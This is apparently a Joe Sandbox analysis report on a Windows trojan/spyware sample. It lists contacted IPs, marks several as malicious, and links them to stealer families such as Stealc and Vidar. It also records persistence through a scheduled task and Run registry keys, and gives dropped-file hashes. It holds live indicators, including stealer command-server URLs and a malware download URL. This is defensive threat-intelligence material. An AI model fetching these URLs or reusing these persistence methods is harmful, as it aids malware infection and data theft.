https://addons.mozilla.org/%LOCALE%/firefox/	firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://json-schema.org/draft-06/schema#	firefox.exe, 00000019.00000003.1924224531.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.avito.ru/	firefox.exe, 00000019.00000003.1958311114.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1957522404.000001EBF8FC3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.80.68	unknown	United States	15169	GOOGLEUS	false
185.215.113.100	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
13.107.246.40	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
152.195.19.97	unknown	United States	15133	EDGECASTUS	false
142.250.64.78	unknown	United States	15169	GOOGLEUS	false
142.250.81.238	unknown	United States	15169	GOOGLEUS	false
142.250.64.97	unknown	United States	15169	GOOGLEUS	false
162.159.61.3	unknown	United States	13335	CLOUDFLARENETUS	false
34.117.188.166	contile.services.mozilla.com	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
23.200.0.9	unknown	United States	20940	AKAMAI-ASN1EU	false
31.41.244.10	unknown	Russian Federation	61974	AEROEXPRESS-ASRU	true
172.64.41.3	chrome.cloudflare-dns.com	United States	13335	CLOUDFLARENETUS	false
52.222.236.48	services.addons.mozilla.org	United States	16509	AMAZON-02US	false
34.120.208.123	telemetry-incoming.r53-2.services.mozilla.com	United States	15169	GOOGLEUS	false
31.41.244.11	unknown	Russian Federation	61974	AEROEXPRESS-ASRU	false
94.245.104.56	ssl.bingadsedgeextension-prod-europe.azurewebsites.net	United Kingdom	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
34.149.100.209	prod.remote-settings.prod.webservices.mozgcp.net	United States	2686	ATGS-MMD-ASUS	false
34.107.243.93	push.services.mozilla.com	United States	15169	GOOGLEUS	false
172.253.62.84	unknown	United States	15169	GOOGLEUS	false
34.107.221.82	prod.detectportal.prod.cloudops.mozgcp.net	United States	15169	GOOGLEUS	false
35.244.181.201	prod.balrog.prod.cloudops.mozgcp.net	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
23.44.201.4	unknown	United States	20940	AKAMAI-ASN1EU	false
35.190.72.216	prod.classify-client.prod.webservices.mozgcp.net	United States	15169	GOOGLEUS	false
34.160.144.191	prod.content-signature-chains.prod.webservices.mozgcp.net	United States	2686	ATGS-MMD-ASUS	false
142.251.163.84	unknown	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.7
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1505463
Start date and time:	2024-09-06 09:56:52 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	pud8g3zixE.exe renamed because original name is a hash value
Original Sample Name:	57a1c647b3b2b8b56998e59efe21be64.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@80/201@60/28
EGA Information:	Successful, ratio: 30%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, backgroundTaskHost.exe, svchost.exe, UsoClient.exe
Excluded IPs from analysis (whitelisted): 93.184.221.240, 13.107.42.16, 74.125.71.84, 204.79.197.239, 13.107.21.239, 142.250.185.174, 13.107.6.158, 2.19.126.145, 2.19.126.152, 172.217.18.3, 142.250.185.195, 2.23.209.184, 2.23.209.182, 2.23.209.179, 2.23.209.180, 2.23.209.177, 2.23.209.176, 2.23.209.173, 2.23.209.183, 2.23.209.175, 20.74.47.205, 2.22.61.56, 2.22.61.59, 2.18.121.79, 2.18.121.73, 74.125.133.84, 64.233.184.84, 35.84.243.71, 44.239.24.213, 52.11.251.113, 216.58.206.42, 142.250.74.202, 142.250.185.238, 69.164.46.128, 142.251.32.99, 142.250.176.195, 142.251.40.227
Excluded domains from analysis (whitelisted): ciscobinary.openh264.org, config.edge.skype.com.trafficmanager.net, slscr.update.microsoft.com, a416.dscd.akamai.net, incoming.telemetry.mozilla.org, a17.rackcdn.com.mdc.edgesuite.net, aus5.mozilla.org, time.windows.com, arc.msn.com, iris-de-prod-azsc-v2-frc-b.francecentral.cloudapp.azure.com, a19.dscg10.akamai.net, clients2.google.com, e86303.dscx.akamaiedge.net, www.bing.com.edgekey.net, redirector.gvt1.com, login.live.com, config-edge-skype.l-0007.l-msedge.net, msedge.b.tlu.dl.delivery.mp.microsoft.com, arc.trafficmanager.net, safebrowsing.googleapis.com, www.gstatic.com, l-0007.l-msedge.net, config.edge.skype.com, www.bing.com, edge-microsoft-com.dual-a-0036.a-msedge.net, fs.microsoft.com, shavar.prod.mozaws.net, accounts.google.com, bingadsedgeextension-prod.trafficmanager.net, bzib.nelreports.net.akamaized.net, api.edgeoffer.microsoft.com, fonts.gstatic.com, settings-win.data.microsoft.com, ctldl.windowsupdate.com, b-0005.b-msedge.net, detectportal.prod.moza
Execution Graph export aborted for target 76251a0626.exe, PID 8008 because there are no executed function
Execution Graph export aborted for target 88b8632b35.exe, PID 1568 because there are no executed function
Execution Graph export aborted for target firefox.exe, PID 5932 because there are no executed function
Execution Graph export aborted for target pud8g3zixE.exe, PID 996 because it is empty
Execution Graph export aborted for target svoutse.exe, PID 3396 because there are no executed function
Execution Graph export aborted for target svoutse.exe, PID 6372 because there are no executed function
HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
03:58:01	API Interceptor	8268178x Sleep call for process: svoutse.exe modified
05:58:17	API Interceptor	21x Sleep call for process: 88b8632b35.exe modified
05:58:52	API Interceptor	1x Sleep call for process: firefox.exe modified
09:57:47	Task Scheduler	Run new task: svoutse path: C:\Users\user~1\AppData\Local\Temp\0e8d0864aa\svoutse.exe
11:58:14	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 88b8632b35.exe C:\Users\user~1\AppData\Local\Temp\1000030001\88b8632b35.exe
11:58:23	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 88b8632b35.exe C:\Users\user~1\AppData\Local\Temp\1000030001\88b8632b35.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.100	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.100/e2b1563c6670f193.php
	gobEmOm5sr.exe	Get hash	malicious	LummaC, PureLog Stealer, RedLine, Socks5Systemz, Stealc, Vidar, Xmrig	Browse	185.215.113.100/0d60be0de163924d/sqlite3.dll
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.100/e2b1563c6670f193.php
	http://31.41.244.9/nokia/lamp.exe	Get hash	malicious	Stealc	Browse	185.215.113.100/0d60be0de163924d/sqlite3.dll
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100/e2b1563c6670f193.php
13.107.246.40	Payment Transfer Receipt.shtml	Get hash	malicious	HTMLPhisher	Browse	www.aib.gov.uk/
	NEW ORDER.xls	Get hash	malicious	Unknown	Browse	2s.gg/3zs
	PO_OCF 408.xls	Get hash	malicious	Unknown	Browse	2s.gg/42Q
	06836722_218 Aluplast.docx.doc	Get hash	malicious	Unknown	Browse	2s.gg/3zk
	Quotation.xls	Get hash	malicious	Unknown	Browse	2s.gg/3zM
152.195.19.97	http://ustteam.com/	Get hash	malicious	Unknown	Browse	www.ust.com/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
example.org	file.exe	Get hash	malicious	Unknown	Browse	93.184.215.14
	file.exe	Get hash	malicious	Unknown	Browse	93.184.215.14
	file.exe	Get hash	malicious	Unknown	Browse	93.184.215.14
	file.exe	Get hash	malicious	Unknown	Browse	93.184.215.14
	file.exe	Get hash	malicious	Unknown	Browse	93.184.215.14
	file.exe	Get hash	malicious	Unknown	Browse	93.184.215.14
	file.exe	Get hash	malicious	Unknown	Browse	93.184.215.14
	file.exe	Get hash	malicious	Unknown	Browse	93.184.215.14
	file.exe	Get hash	malicious	Unknown	Browse	93.184.215.14
	file.exe	Get hash	malicious	Unknown	Browse	93.184.215.14
chrome.cloudflare-dns.com	file.exe	Get hash	malicious	Unknown	Browse	162.159.61.3
	709827261526152615.exe	Get hash	malicious	FormBook	Browse	172.64.41.3
	file.exe	Get hash	malicious	Unknown	Browse	162.159.61.3
	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	file.exe	Get hash	malicious	Unknown	Browse	162.159.61.3
	file.exe	Get hash	malicious	Unknown	Browse	162.159.61.3
	file.exe	Get hash	malicious	Unknown	Browse	162.159.61.3
	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	file.exe	Get hash	malicious	Unknown	Browse	162.159.61.3
	file.exe	Get hash	malicious	Unknown	Browse	162.159.61.3
ssl.bingadsedgeextension-prod-europe.azurewebsites.net	file.exe	Get hash	malicious	Unknown	Browse	94.245.104.56
	file.exe	Get hash	malicious	Unknown	Browse	94.245.104.56
	file.exe	Get hash	malicious	Unknown	Browse	94.245.104.56
	file.exe	Get hash	malicious	Unknown	Browse	94.245.104.56
	file.exe	Get hash	malicious	Unknown	Browse	94.245.104.56
	file.exe	Get hash	malicious	Unknown	Browse	94.245.104.56
	file.exe	Get hash	malicious	Unknown	Browse	94.245.104.56
	file.exe	Get hash	malicious	Unknown	Browse	94.245.104.56
	file.exe	Get hash	malicious	Unknown	Browse	94.245.104.56
	file.exe	Get hash	malicious	Coinhive, Xmrig	Browse	94.245.104.56
services.addons.mozilla.org	file.exe	Get hash	malicious	Unknown	Browse	18.65.39.31
	file.exe	Get hash	malicious	Unknown	Browse	52.222.236.120
	file.exe	Get hash	malicious	Unknown	Browse	52.222.236.80
	file.exe	Get hash	malicious	Unknown	Browse	52.222.236.48
	file.exe	Get hash	malicious	Unknown	Browse	52.222.236.120
	file.exe	Get hash	malicious	Unknown	Browse	52.222.236.23
	file.exe	Get hash	malicious	Unknown	Browse	3.165.190.17
	file.exe	Get hash	malicious	Unknown	Browse	52.222.236.80
	file.exe	Get hash	malicious	Unknown	Browse	52.222.236.120
	file.exe	Get hash	malicious	Unknown	Browse	52.222.236.48

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.100
	g082Q9DajU.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, PureLog Stealer	Browse	185.215.113.117
	C3zG9LFeSX.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	gobEmOm5sr.exe	Get hash	malicious	LummaC, PureLog Stealer, RedLine, Socks5Systemz, Stealc, Vidar, Xmrig	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.100
	http://31.41.244.9/nokia/lamp.exe	Get hash	malicious	Stealc	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
CLOUDFLARENETUS	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	g082Q9DajU.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, PureLog Stealer	Browse	188.114.97.3
	file.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	Wrong Bank Details.exe	Get hash	malicious	DarkTortilla, FormBook	Browse	172.67.139.29
	PO_00978876.vbs	Get hash	malicious	Unknown	Browse	162.159.133.233
	doc330391202408011.exe	Get hash	malicious	FormBook	Browse	172.67.192.47
	709827261526152615.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	Recibo de env#U00edo de DHL_Gu#U00eda de embarque Doc_PRG211003417144356060.PDF.lzh.lzh.lzh.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	Bill of Lading.xls	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	DHL airwaybill # 6913321715 & BL Draft copy.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
EDGECASTUS	file.exe	Get hash	malicious	Unknown	Browse	152.195.19.97
	709827261526152615.exe	Get hash	malicious	FormBook	Browse	152.195.19.97
	file.exe	Get hash	malicious	Unknown	Browse	152.195.19.97
	file.exe	Get hash	malicious	Unknown	Browse	152.195.19.97
	file.exe	Get hash	malicious	Unknown	Browse	152.195.19.97
	file.exe	Get hash	malicious	Unknown	Browse	152.195.19.97
	file.exe	Get hash	malicious	Unknown	Browse	152.195.19.97
	file.exe	Get hash	malicious	Unknown	Browse	152.195.19.97
	file.exe	Get hash	malicious	Unknown	Browse	152.195.19.97
	https://xy2.eu/3k2fI	Get hash	malicious	Unknown	Browse	192.229.221.25
MICROSOFT-CORP-MSN-AS-BLOCKUS	file.exe	Get hash	malicious	Unknown	Browse	94.245.104.56
	ODy57hA4Su.exe	Get hash	malicious	Tofsee	Browse	52.101.11.0
	Uc84uB877e.exe	Get hash	malicious	Tofsee	Browse	52.101.8.49
	file.exe	Get hash	malicious	Unknown	Browse	13.107.253.72
	file.exe	Get hash	malicious	Unknown	Browse	94.245.104.56
	file.exe	Get hash	malicious	Unknown	Browse	94.245.104.56
	All-in-one Calculation Tool.xlsm	Get hash	malicious	Unknown	Browse	52.111.243.31
	All-in-one Calculation Tool.xlsm	Get hash	malicious	Unknown	Browse	13.107.246.57
	file.exe	Get hash	malicious	Unknown	Browse	13.107.246.57
	file.exe	Get hash	malicious	Unknown	Browse	94.245.104.56

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	file.exe	Get hash	malicious	Unknown	Browse	13.85.23.86 184.28.90.27 4.231.128.59 20.190.160.22
	IDR-500000000.pdf	Get hash	malicious	Unknown	Browse	13.85.23.86 184.28.90.27 4.231.128.59 20.190.160.22
	http://seoattal.hosted.phplist.com/lists/lt.php?tid=fU9RVwRXBQ1dUE9QVVcFSQQDVFEVAAUABBRSUFtRUwEAAAFaUVNNAl1XU1JRVlFJAgMEXhVWUlMDFAVXAAAfVQcEUFZWBABQXAJRHgUGB1EEUVJeFVBSAlMUUAELUB8FVlcFTlFQBQdUAFNWAVYGBw	Get hash	malicious	Unknown	Browse	13.85.23.86 184.28.90.27 4.231.128.59 20.190.160.22
	https://dl.dropboxusercontent.com/scl/fi/vkqr9mbz83lcdol6vui87/DKM-991809-PDF.zip?rlkey=jp9ltq9urj994wf0gc2dbtsi1&st=2ozy3g4j&dl=0	Get hash	malicious	Unknown	Browse	13.85.23.86 184.28.90.27 4.231.128.59 20.190.160.22
	file.exe	Get hash	malicious	Unknown	Browse	13.85.23.86 184.28.90.27 4.231.128.59 20.190.160.22
	http://cache.cloudswiftcdn.com	Get hash	malicious	Unknown	Browse	13.85.23.86 184.28.90.27 4.231.128.59 20.190.160.22
	http://cdn.staticfile.net/jquery.imagesloaded/3.1.8/imagesloaded.pkgd.min.js	Get hash	malicious	Unknown	Browse	13.85.23.86 184.28.90.27 4.231.128.59 20.190.160.22
	file.exe	Get hash	malicious	Unknown	Browse	13.85.23.86 184.28.90.27 4.231.128.59 20.190.160.22
	file.exe	Get hash	malicious	Unknown	Browse	13.85.23.86 184.28.90.27 4.231.128.59 20.190.160.22
	https://u1404228.ct.sendgrid.net/ls/click?upn=u001.53NsXfgUBOeYzK87Mt8UmmFmJrZ7XUeaM2H1JJzIOlLD8XdRMGUjLjiETSkkNSOO1aPcOhsB-2B6p58337PPTvLBJHf93ZwdhKuc0pYJ3CCFhPzGYkRFXax0jGvIeRFmcP5G0BUyJ6YhdCuxj2rmKfEA3sfYg2UNxl72w1Me3oPfdrF6jbhGk315PA9TABMIUQaw-2BWiKWUThNlxL-2FiIJdoH5tiTQT-2Bm8o6f2DtPJqJqYyOmKsC6Z8r8BDMH-2BRyR0DPAbc1o4jsJAeLDJ31LwWjsFQYr3zFK5cIf8Mbd-2BRzOeXFDSMm6es3Y0fepvpPG5r7pfagssMFSYnyu8MHsVv5hRcIKJqjAZyLx1ckeV-2FaCznPfw8naJb82iSt3TNueNL1vH7DevWmKVRPxk4wZ5wzTJXKbWW9anlXuh-2BQXFzp8R8-2BdEEizEjCv3UcDuHMQ1pDH865wy4DUZnYMpZjJQJPawcQswhgRnWgvPzhIRyQE-2Bc-3DkIeO_CR4Iv1KReyG-2BUTiHEM2iSrmxUTGCd7nll-2F8pyW4fRHUIiL68JldL5hjEvlqIxpWk9hPYxNH8eo9VRHfVERALBwpMyAhjDc4FUwScFs2ucRUabaJ73tdO-2FPebairfMf4xwZ2dpDlmkqO5pmgc1gE0gGghSpi3dDGJNhz4YymAGUOPzRzAYltzk0Ba7IAVZeXH7Jn8rume2KIoU57-2Fl62ae-2FaTXSu1TIVQ6Migf-2F6NGXqO6vztNaikiQe23mzDzfi19JJ-2FVN5j6ZPVhD34lLHzKpdiifzixAZur7VZCR5Hc24MfYQGTYVbJWBIhMdpT2lgG-2Bg-2FTIWWIZlY-2Fzm-2BK3i-2F0Q-3D-3D	Get hash	malicious	Unknown	Browse	13.85.23.86 184.28.90.27 4.231.128.59 20.190.160.22
fb0aa01abe9d8e4037eb3473ca6e2dca	file.exe	Get hash	malicious	Unknown	Browse	35.244.181.201 34.149.100.209 34.160.144.191 52.222.236.48 34.120.208.123
	file.exe	Get hash	malicious	Unknown	Browse	35.244.181.201 34.149.100.209 34.160.144.191 52.222.236.48 34.120.208.123
	file.exe	Get hash	malicious	Unknown	Browse	35.244.181.201 34.149.100.209 34.160.144.191 52.222.236.48 34.120.208.123
	file.exe	Get hash	malicious	Unknown	Browse	35.244.181.201 34.149.100.209 34.160.144.191 52.222.236.48 34.120.208.123
	file.exe	Get hash	malicious	Unknown	Browse	35.244.181.201 34.149.100.209 34.160.144.191 52.222.236.48 34.120.208.123
	file.exe	Get hash	malicious	Unknown	Browse	35.244.181.201 34.149.100.209 34.160.144.191 52.222.236.48 34.120.208.123
	file.exe	Get hash	malicious	Unknown	Browse	35.244.181.201 34.149.100.209 34.160.144.191 52.222.236.48 34.120.208.123
	file.exe	Get hash	malicious	Unknown	Browse	35.244.181.201 34.149.100.209 34.160.144.191 52.222.236.48 34.120.208.123
	file.exe	Get hash	malicious	Unknown	Browse	35.244.181.201 34.149.100.209 34.160.144.191 52.222.236.48 34.120.208.123
	file.exe	Get hash	malicious	Unknown	Browse	35.244.181.201 34.149.100.209 34.160.144.191 52.222.236.48 34.120.208.123

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll (copy)	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\3b8764e7-c4d0-4d25-af5c-5bb5631f7887.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	57623
Entropy (8bit):	6.1038090065156885
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7yn64OPGWv/sxtw8j7VLyMV/YoskFoz:z/0+zI7yn6pv/4KeVeZoskG
MD5:	8314200EEA1ACAE392E59526DAE2A96C
SHA1:	ACC50E247F4621743F1906045E160B41B0FBEBAB
SHA-256:	E5DA49034010185ABD52F4F215DD33F786F1A81F04AE08D6A3C7C75231057186
SHA-512:	6C5EDFF1EB0A21B116C20C11FF3874E90A9BDCD10C986C11FD083835093E8F725C2FA4FE510693B1313BD40E269E17F3F928A2666D7944BF94B8099C252FC92E
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\43fcd665-ee27-4fa3-a308-4d76d4b7f7a2.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	57623
Entropy (8bit):	6.1038090065156885
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7yn64OPGWv/sxtw8j7VLyMV/YoskFoz:z/0+zI7yn6pv/4KeVeZoskG
MD5:	8314200EEA1ACAE392E59526DAE2A96C
SHA1:	ACC50E247F4621743F1906045E160B41B0FBEBAB
SHA-256:	E5DA49034010185ABD52F4F215DD33F786F1A81F04AE08D6A3C7C75231057186
SHA-512:	6C5EDFF1EB0A21B116C20C11FF3874E90A9BDCD10C986C11FD083835093E8F725C2FA4FE510693B1313BD40E269E17F3F928A2666D7944BF94B8099C252FC92E
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\4d6e226b-8d2b-44a0-b710-4bf3fb9c02a9.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	57683
Entropy (8bit):	6.103623121199734
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7yOH4XPGWv/sxtwXj7VLyMV/YoskFoz:z/0+zI7yOHYv/4KfVeZoskG
MD5:	DCED16E6556504F6C967105E88E30A94
SHA1:	0E974E3F887EE0FDFC6B9CF55F7DE5FDACAA0CF0
SHA-256:	3D4297C6BC82F656424054CB102043F0BCE1CF3B8A32FDC425BE66F6647B2581
SHA-512:	BB5D538B0C3E8AF89A7B9CA3B46878AB6CD948CF075AEBAC282CAB862F74D6A2A1869229360F31866FF9BC729D8D2837E0A5571D747FA4E105EB0EE6831FE147
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\7d046ee2-01bd-4db7-8152-fed2d5fb046d.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	107893
Entropy (8bit):	4.640136267101608
Encrypted:	false
